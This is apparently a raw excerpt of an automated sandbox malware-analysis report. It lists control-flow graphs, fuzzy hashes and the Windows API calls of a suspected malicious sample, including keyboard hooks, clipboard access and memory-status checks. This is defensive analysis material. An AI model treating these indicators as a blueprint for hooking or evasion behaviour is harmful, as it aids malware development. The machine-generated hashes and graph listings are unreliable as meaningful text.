                                                                    control_flow_graph 196 6d5cf30-6d5cf4b 197 6d5cf4d-6d5cf50 196->197 198 6d5cf52-6d5cf94 197->198 199 6d5cf99-6d5cf9c 197->199 198->199 200 6d5cfe5-6d5cfe8 199->200 201 6d5cf9e-6d5cfe0 199->201 203 6d5d031-6d5d034 200->203 204 6d5cfea-6d5d02c 200->204 201->200 205 6d5d057-6d5d05a 203->205 206 6d5d036-6d5d052 203->206 204->203 209 6d5d0a3-6d5d0a6 205->209 210 6d5d05c-6d5d09e 205->210 206->205 214 6d5d0c3-6d5d0c6 209->214 215 6d5d0a8-6d5d0be 209->215 210->209 217 6d5d10f-6d5d112 214->217 218 6d5d0c8-6d5d10a 214->218 215->214 224 6d5d114-6d5d116 217->224 225 6d5d121-6d5d124 217->225 218->217 227 6d5d415 224->227 228 6d5d11c 224->228 229 6d5d126-6d5d168 225->229 230 6d5d16d-6d5d170 225->230 238 6d5d418-6d5d424 227->238 228->225 229->230 235 6d5d172-6d5d1b4 230->235 236 6d5d1b9-6d5d1bc 230->236 235->236 242 6d5d1c6-6d5d1c9 236->242 243 6d5d1be-6d5d1c3 236->243 245 6d5d27a-6d5d289 238->245 246 6d5d42a-6d5d717 238->246 248 6d5d212-6d5d215 242->248 249 6d5d1cb-6d5d20d 242->249 243->242 252 6d5d298-6d5d2a4 245->252 253 6d5d28b-6d5d290 245->253 408 6d5d71d-6d5d723 246->408 409 6d5d93e-6d5d948 246->409 254 6d5d217-6d5d226 248->254 255 6d5d25e-6d5d261 248->255 249->248 256 6d5d949-6d5d97e 252->256 257 6d5d2aa-6d5d2bc 252->257 253->252 263 6d5d235-6d5d241 254->263 264 6d5d228-6d5d22d 254->264 255->238 266 6d5d267-6d5d26a 255->266 281 6d5d980-6d5d983 256->281 277 6d5d2c1-6d5d2c3 257->277 263->256 273 6d5d247-6d5d259 263->273 264->263 274 6d5d275-6d5d278 266->274 275 6d5d26c-6d5d26e 266->275 273->255 274->245 274->277 279 6d5d270 275->279 280 6d5d2d3-6d5d2dc 275->280 285 6d5d2c5 277->285 286 6d5d2ca-6d5d2cd 277->286 279->274 289 6d5d2de-6d5d2e3 280->289 290 6d5d2eb-6d5d2f7 280->290 291 6d5d985-6d5d9a1 281->291 292 6d5d9a6-6d5d9a9 281->292 285->286 286->197 286->280 289->290 295 6d5d2fd-6d5d311 290->295 296 6d5d408-6d5d40d 290->296 291->292 293 6d5d9b8-6d5d9bb 292->293 294 6d5d9ab call 6d5da9d 292->294 301 6d5d9bd-6d5d9e9 293->301 302 6d5d9ee-6d5d9f0 293->302 305 6d5d9b1-6d5d9b3 294->305 295->227 314 6d5d317-6d5d329 295->314 296->227 301->302 307 6d5d9f7-6d5d9fa 302->307 308 6d5d9f2 302->308 305->293 307->281 313 6d5d9fc-6d5da0b 307->313 308->307 321 6d5da72-6d5da87 313->321 322 6d5da0d-6d5da70 call 6d56578 313->322 319 6d5d34d-6d5d34f 314->319 320 6d5d32b-6d5d331 314->320 329 6d5d359-6d5d365 319->329 324 6d5d335-6d5d341 320->324 325 6d5d333 320->325 322->321 328 6d5d343-6d5d34b 324->328 325->328 328->329 336 6d5d367-6d5d371 329->336 337 6d5d373 329->337 339 6d5d378-6d5d37a 336->339 337->339 339->227 342 6d5d380-6d5d39c call 6d56578 339->342 350 6d5d39e-6d5d3a3 342->350 351 6d5d3ab-6d5d3b7 342->351 350->351 351->296 354 6d5d3b9-6d5d406 351->354 354->227 410 6d5d725-6d5d72a 408->410 411 6d5d732-6d5d73b 408->411 410->411 411->256 412 6d5d741-6d5d754 411->412 414 6d5d92e-6d5d938 412->414 415 6d5d75a-6d5d760 412->415 414->408 414->409 416 6d5d762-6d5d767 415->416 417 6d5d76f-6d5d778 415->417 416->417 417->256 418 6d5d77e-6d5d79f 417->418 421 6d5d7a1-6d5d7a6 418->421 422 6d5d7ae-6d5d7b7 418->422 421->422 422->256 423 6d5d7bd-6d5d7da 422->423 423->414 426 6d5d7e0-6d5d7e6 423->426 426->256 427 6d5d7ec-6d5d805 426->427 429 6d5d921-6d5d928 427->429 430 6d5d80b-6d5d832 427->430 429->414 429->426 430->256 433 6d5d838-6d5d842 430->433 433->256 434 6d5d848-6d5d85f 433->434 436 6d5d861-6d5d86c 434->436 437 6d5d86e-6d5d889 434->437 436->437 437->429 442 6d5d88f-6d5d8a8 call 6d56578 437->442 446 6d5d8b7-6d5d8c0 442->446 447 6d5d8aa-6d5d8af 442->447 446->256 448 6d5d8c6-6d5d91a 446->448 447->446 448->429
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q$$]q
                                                                    • API String ID: 0-182748909
                                                                    • Opcode ID: e0944e0570561b5ff9c1ad18c641136e0cba21f812eeb191718395b46c4930ca
                                                                    • Instruction ID: 2f1b2865db5b9cdceac3928cd95a80ebf9a788a464d14d69bf3ae29e017f9dee
                                                                    • Opcode Fuzzy Hash: e0944e0570561b5ff9c1ad18c641136e0cba21f812eeb191718395b46c4930ca
                                                                    • Instruction Fuzzy Hash: A0627E30A0020A8FCB55EF69E580A5DB7F7FF84304B218928D4099F769DB79EC46CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D54B78 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 456 6d54b78-6d54b9c 457 6d54b9e-6d54ba1 456->457 458 6d54ba3-6d54bbd 457->458 459 6d54bc2-6d54bc5 457->459 458->459 460 6d552a4-6d552a6 459->460 461 6d54bcb-6d54cc3 459->461 463 6d552ad-6d552b0 460->463 464 6d552a8 460->464 479 6d54d46-6d54d4d 461->479 480 6d54cc9-6d54d16 call 6d55421 461->480 463->457 466 6d552b6-6d552c3 463->466 464->463 481 6d54dd1-6d54dda 479->481 482 6d54d53-6d54dc3 479->482 493 6d54d1c-6d54d38 480->493 481->466 499 6d54dc5 482->499 500 6d54dce 482->500 496 6d54d43 493->496 497 6d54d3a 493->497 496->479 497->496 499->500 500->481
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq$\Obq
                                                                    • API String ID: 0-4057264190
                                                                    • Opcode ID: 19c102297fa28049a2d62d7cc556565770028161337d24921dc923cfa44dadba
                                                                    • Instruction ID: 80f4aac3a9f915315893e25bd34ce6efc548769e73b2983b35fe64c16d4f5682
                                                                    • Opcode Fuzzy Hash: 19c102297fa28049a2d62d7cc556565770028161337d24921dc923cfa44dadba
                                                                    • Instruction Fuzzy Hash: 5C617230F002199FEF549FA9D8547AEBAF6FFC8710F208429D50AEB394DA758C418B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D5911F Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 924 6d5911f-6d59124 926 6d59185-6d59187 924->926 927 6d59126-6d59155 924->927 928 6d59171-6d59175 926->928 929 6d59189 926->929 933 6d59157-6d5915a 927->933 934 6d59177-6d5917d 928->934 935 6d5918d-6d591a3 928->935 931 6d5918b-6d5918c 929->931 932 6d591aa-6d591b0 929->932 931->935 938 6d591b2-6d591b7 932->938 939 6d591c8-6d5922d 932->939 940 6d59160-6d59168 933->940 941 6d59a18-6d59a1b 933->941 936 6d59181-6d59183 934->936 937 6d5917f 934->937 935->932 936->935 937->935 943 6d5922e-6d59239 938->943 944 6d591b8 938->944 939->943 940->928 945 6d59a41-6d59a43 941->945 946 6d59a1d-6d59a3c 941->946 955 6d59265-6d59281 943->955 956 6d5923b-6d5925e 943->956 950 6d591bc-6d591be 944->950 951 6d591b9-6d591ba 944->951 947 6d59a45 945->947 948 6d59a4a-6d59a4d 945->948 946->945 947->948 948->933 952 6d59a53-6d59a5d 948->952 950->939 951->939 965 6d59283-6d592a6 955->965 966 6d592ad-6d592c8 955->966 956->955 965->966 973 6d592f3-6d5930e 966->973 974 6d592ca-6d592ec 966->974 980 6d59310-6d5932c 973->980 981 6d59333-6d59341 973->981 974->973 980->981 982 6d59351-6d593cb 981->982 983 6d59343-6d5934c 981->983 989 6d593cd-6d593eb 982->989 990 6d59418-6d5942d 982->990 983->952 994 6d59407-6d59416 989->994 995 6d593ed-6d593fc 989->995 990->941 994->989 994->990 995->994
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $]q$$]q
                                                                    • API String ID: 0-127220927
                                                                    • Opcode ID: 6952ddfc6c57e03c92e75cd5bf0c7b98b574896df2517895226c754aa459f25f
                                                                    • Instruction ID: f4a3ff75176e218f20d2f11720689f3d9f1f391170faeec5ea6fad7d061d4271
                                                                    • Opcode Fuzzy Hash: 6952ddfc6c57e03c92e75cd5bf0c7b98b574896df2517895226c754aa459f25f
                                                                    • Instruction Fuzzy Hash: 4651CF30B002069FDF94CB79D8A0BAE73F6EFC8244F018469C80ADB784DE349C428B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D54B68 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1135 6d54b68-6d54b9c 1138 6d54b9e-6d54ba1 1135->1138 1139 6d54ba3-6d54bbd 1138->1139 1140 6d54bc2-6d54bc5 1138->1140 1139->1140 1141 6d552a4-6d552a6 1140->1141 1142 6d54bcb-6d54cc3 1140->1142 1144 6d552ad-6d552b0 1141->1144 1145 6d552a8 1141->1145 1160 6d54d46-6d54d4d 1142->1160 1161 6d54cc9-6d54d16 call 6d55421 1142->1161 1144->1138 1147 6d552b6-6d552c3 1144->1147 1145->1144 1162 6d54dd1-6d54dda 1160->1162 1163 6d54d53-6d54dc3 1160->1163 1174 6d54d1c-6d54d38 1161->1174 1162->1147 1180 6d54dc5 1163->1180 1181 6d54dce 1163->1181 1177 6d54d43 1174->1177 1178 6d54d3a 1174->1178 1177->1160 1178->1177 1180->1181 1181->1162
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541712075.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d50000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: fbq$XPbq
                                                                    • API String ID: 0-2292610095
                                                                    • Opcode ID: cf83d65647c3b65d44e9622804f7a3a76a5b2a6b96323402b24bc2172b8e61b3
                                                                    • Instruction ID: d3512d2843f839f7016596b285085d0be8fa0432eb69ab2609cfa2e3cac762d6
                                                                    • Opcode Fuzzy Hash: cf83d65647c3b65d44e9622804f7a3a76a5b2a6b96323402b24bc2172b8e61b3
                                                                    • Instruction Fuzzy Hash: C9519230F002099FDB549FA9C8547AEBBF6FFC8710F21852AD506EB394DA798C418B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013DE978 Relevance: 1.6, APIs: 1, Instructions: 138COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1222 13de978-13de993 1223 13de9bd-13de9dc call 13de578 1222->1223 1224 13de995-13de9bc 1222->1224 1229 13de9de-13de9e1 1223->1229 1230 13de9e2-13dea41 1223->1230 1237 13dea47-13dead4 GlobalMemoryStatusEx 1230->1237 1238 13dea43-13dea46 1230->1238 1242 13deadd-13deb05 1237->1242 1243 13dead6-13deadc 1237->1243 1243->1242
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524828442.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_13d0000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f13231771941778e7da631c12f46f8191e96f5881818859289e1dbdce338f0e1
                                                                    • Instruction ID: 99de47cbd38d055a2ec360419527eecba7d32773e4f78953542073431633f1ad
                                                                    • Opcode Fuzzy Hash: f13231771941778e7da631c12f46f8191e96f5881818859289e1dbdce338f0e1
                                                                    • Instruction Fuzzy Hash: CA415532D053898FCB04DFB9D8046DEBFB5AF89310F1485AAE404A7641DB389880CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D42593 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1246 6d42593-6d425fe 1248 6d42600-6d42606 1246->1248 1249 6d42609-6d42610 1246->1249 1248->1249 1250 6d42612-6d42618 1249->1250 1251 6d4261b-6d42653 1249->1251 1250->1251 1252 6d4265b-6d426ba CreateWindowExW 1251->1252 1253 6d426c3-6d426fb 1252->1253 1254 6d426bc-6d426c2 1252->1254 1258 6d426fd-6d42700 1253->1258 1259 6d42708 1253->1259 1254->1253 1258->1259 1260 6d42709 1259->1260 1260->1260
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D426AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 7fad71a36a7ee3c1d31c1cc70cae45f6af5aa23a572d0e576142e081510039b7
                                                                    • Instruction ID: b026216f7496feb6ddbf1d34c4e8e41f1387ce76f9ce7b8f6636fc2141d7f15c
                                                                    • Opcode Fuzzy Hash: 7fad71a36a7ee3c1d31c1cc70cae45f6af5aa23a572d0e576142e081510039b7
                                                                    • Instruction Fuzzy Hash: A041B1B1D103499FDB14DF9AC884ADEBBB5BF48310F24812AE419AB250D775A985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D42598 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06D426AA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 415e12ed32fe8044ca3d12cc368901753666ea87f29e1522389e3acc6b8468fb
                                                                    • Instruction ID: c6b8e341ac89740149468152c720acf81dea4fcd62f98f59db13415b0d16d76d
                                                                    • Opcode Fuzzy Hash: 415e12ed32fe8044ca3d12cc368901753666ea87f29e1522389e3acc6b8468fb
                                                                    • Instruction Fuzzy Hash: 4A41BEB1D103499FDB14DF9AC884ADEBBB5BF48310F24812AE819AB250D775A985CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D45EDC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 06D47249
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallProcWindow
                                                                    • String ID:
                                                                    • API String ID: 2714655100-0
                                                                    • Opcode ID: 6614cc1dbf839d1ec58ce3d9fc3f86d2f31c92c571e581692adfc5d36a9436b9
                                                                    • Instruction ID: b4f0f10a60be704423899020f8d3c5b714f6e743559b2d7afce1935dede2214f
                                                                    • Opcode Fuzzy Hash: 6614cc1dbf839d1ec58ce3d9fc3f86d2f31c92c571e581692adfc5d36a9436b9
                                                                    • Instruction Fuzzy Hash: 5A4138B4A00349CFDB54DF99C888AAAFBF5FF88314F248459E519A7321D734A841CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D47EC4 Relevance: 1.6, APIs: 1, Instructions: 87comclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: 1b8e12286caf4fddbe2eca8ce62d8ad10eb76341123913df008788ae56a6e532
                                                                    • Instruction ID: dd90fa1a8cab5d628ec5f1217164f26188f3908c348e8bc36165816070d1a85e
                                                                    • Opcode Fuzzy Hash: 1b8e12286caf4fddbe2eca8ce62d8ad10eb76341123913df008788ae56a6e532
                                                                    • Instruction Fuzzy Hash: 3D3153B0D01249DFDB54DF99D984BDEBBF5EF48314F20802AE108AB390DB746945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D478F0 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard
                                                                    • String ID:
                                                                    • API String ID: 220874293-0
                                                                    • Opcode ID: a483ab17b289439bc88da919d20b7b7e6b817281adf555d675b1ff32ae1393a5
                                                                    • Instruction ID: bc605f5a790570bd0fa7ab2f6ba34919543f78c5a5210d30ec6c3a05d6dd50f5
                                                                    • Opcode Fuzzy Hash: a483ab17b289439bc88da919d20b7b7e6b817281adf555d675b1ff32ae1393a5
                                                                    • Instruction Fuzzy Hash: 7A3102B0D02249DFDB54DF99C984BDEBBF5AF48304F248029E404BB390D774A945CBA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D462E8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D46377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: ea2709ede612dd52954490a288a00eb48dd298e21d6269ca4f29ce33f7e1995d
                                                                    • Instruction ID: 16565629bc3eb4524902bf902cf8a35d80706f0f813ae8c90dd642e684c52f65
                                                                    • Opcode Fuzzy Hash: ea2709ede612dd52954490a288a00eb48dd298e21d6269ca4f29ce33f7e1995d
                                                                    • Instruction Fuzzy Hash: ED21E6B5D002489FDB10DFAAD584ADEBFF4FB49310F14805AE955A3350D378A950CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D462F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06D46377
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: d1d48460503806d4b7ed591f92cf572a065ca651af49ff24a28d113cba74db4b
                                                                    • Instruction ID: 27ec301e8658190cac5b0f9f8833bb300010555cace1905ab12b4184c12e2e6c
                                                                    • Opcode Fuzzy Hash: d1d48460503806d4b7ed591f92cf572a065ca651af49ff24a28d113cba74db4b
                                                                    • Instruction Fuzzy Hash: 7221E2B59002489FDB10CFAAD984ADEBBF8FB48310F14801AE958A3350D378A950CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D49A0F Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D49A8B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: 338b9c167a3d026cf4cbc52646b2961d9ad64000c143e1c904cc27b10ae31c5c
                                                                    • Instruction ID: 6ab58f90caf5cdc2ffb5de65565356f89604afc11228034f41ccaa5947082c6a
                                                                    • Opcode Fuzzy Hash: 338b9c167a3d026cf4cbc52646b2961d9ad64000c143e1c904cc27b10ae31c5c
                                                                    • Instruction Fuzzy Hash: 472102B5D002099FCB14DF9AD845BEEBBF5EF88310F14842AE458A7250C774A940CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D49A10 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,00000000,?,?), ref: 06D49A8B
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0
                                                                    • Opcode ID: d74a07a063b0973291e1fde4841e5a346da843d4956e1e7e6fddd67c793023c0
                                                                    • Instruction ID: 953da4c1a43fe12844362aa57ecbf3c5da354e4899a6ef9b573b08adf4588587
                                                                    • Opcode Fuzzy Hash: d74a07a063b0973291e1fde4841e5a346da843d4956e1e7e6fddd67c793023c0
                                                                    • Instruction Fuzzy Hash: 6B210FB5D002099FCB14DF9AC845BEEBBF5EF88310F14842AE458A7250C778A940CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 013DEA60 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE ref: 013DEAC7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4524828442.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_13d0000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    • Opcode ID: e6ead6f921c126603cb758e33321ea464805ceb5b807e041a99ed8aebc6b1e5b
                                                                    • Instruction ID: c29667756dd7da26ec985d44bbc4b7559da48ab176adff54ccc13144ada0d3c2
                                                                    • Opcode Fuzzy Hash: e6ead6f921c126603cb758e33321ea464805ceb5b807e041a99ed8aebc6b1e5b
                                                                    • Instruction Fuzzy Hash: 9F111FB2C0065A9BDB10DF9AD444ADEFBF4FF48320F14816AE818A7240D378A944CFE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D414EB Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06D41556
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 67a6f4e8aedfece365cbc99683c68e2145bc139eff4df7af9ee9a05f5373657b
                                                                    • Instruction ID: c494575e8da92e9af216c14228e24230376968411702f81aa17092ae212f50e0
                                                                    • Opcode Fuzzy Hash: 67a6f4e8aedfece365cbc99683c68e2145bc139eff4df7af9ee9a05f5373657b
                                                                    • Instruction Fuzzy Hash: 651113B6C002498FDB10DF9AD844AEEFBF8EF49320F10841AD429B7210D379A585CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D414F0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06D41556
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: a7313063fd006fcaf2797c30f785ede56b2484dbc33cec392e99c8f01363eaa3
                                                                    • Instruction ID: ab6749c8eb02eb85603ba0beeb36698fce3862530c1e30c98b5b55a3f7ed708e
                                                                    • Opcode Fuzzy Hash: a7313063fd006fcaf2797c30f785ede56b2484dbc33cec392e99c8f01363eaa3
                                                                    • Instruction Fuzzy Hash: A111E0B6C002498FDB10DF9AD844AEEFBF4EF89310F14845AD469B7610D379A585CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D4608C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 06D47DDD
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize
                                                                    • String ID:
                                                                    • API String ID: 2538663250-0
                                                                    • Opcode ID: 03fcc6dbb301e84d1fc757ac267b3956391d9ce4bd09d5909f2e9e296eecea2e
                                                                    • Instruction ID: 7d045355eda5131aa610d40119c36e99da8d25096d6e27451393128395bd03c0
                                                                    • Opcode Fuzzy Hash: 03fcc6dbb301e84d1fc757ac267b3956391d9ce4bd09d5909f2e9e296eecea2e
                                                                    • Instruction Fuzzy Hash: 851115B1810388CFDB20EF9AD445BDEBBF4EB48310F208459D558A7300D378A944CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06D45F34 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,06D47495), ref: 06D4751F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.4541601732.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_6d40000_vZkoWbol.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
